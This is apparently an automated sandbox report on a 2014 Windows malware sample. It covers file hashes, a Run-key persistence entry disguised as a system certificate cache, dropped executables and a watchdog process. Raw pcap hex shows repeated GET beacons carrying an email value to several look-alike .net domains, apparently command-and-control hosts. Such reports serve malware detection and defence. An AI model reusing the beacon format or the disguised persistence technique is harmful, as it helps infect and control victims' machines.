Analysis Date2014-09-19 04:01:39

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1f3a25753457b3202ae0953a66f1b408 sha1: 58bcaf6aa7ea91f225819a4066423c4144400f01 size: 293888
Section.rdata md5: 788eb9230abe8ff7b79386293e0d66e8 sha1: 7c7fd39d34ed2fcdc762bdfb631f0d4d1555044c size: 34816 md5: 1dbd447eeb1a697e54d2d06e9f2b4fa1 sha1: 8bc3e9f8a992fa2af42860aa7e0a7f9841e70dac size: 95744
Timestamp2014-07-24 04:49:47
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Shell System Layer Certificate Cache ➝
C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe

↳ C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.l8bi
Creates FileC:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\upqmhdgg.exe
Creates File\Device\Afd\Endpoint
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\jbimsirdwnq\nphmiehcvbn.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207175 69657473   se..Host: quiets
0x00000070 (00112)   70616365 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b62   se..Host: thinkb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74626569 6e672e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656662   se..Host: chiefb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207477 656c7665   se..Host: twelve
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206869 73746f72   se..Host: histor
0x00000070 (00112)   79666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 61737362   se..Host: classb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b66   se..Host: thinkf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6172 616f6b65 6769726c   mail=karaokegirl
0x00000020 (00032)   5f393940 7961686f 6f2e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74666c6f 7765722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
a[V }+f
bad allocation
bad exception
dddd, MMMM dd, yyyy
DOMAIN error
`dynamic atexit destructor for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
\xR	.!
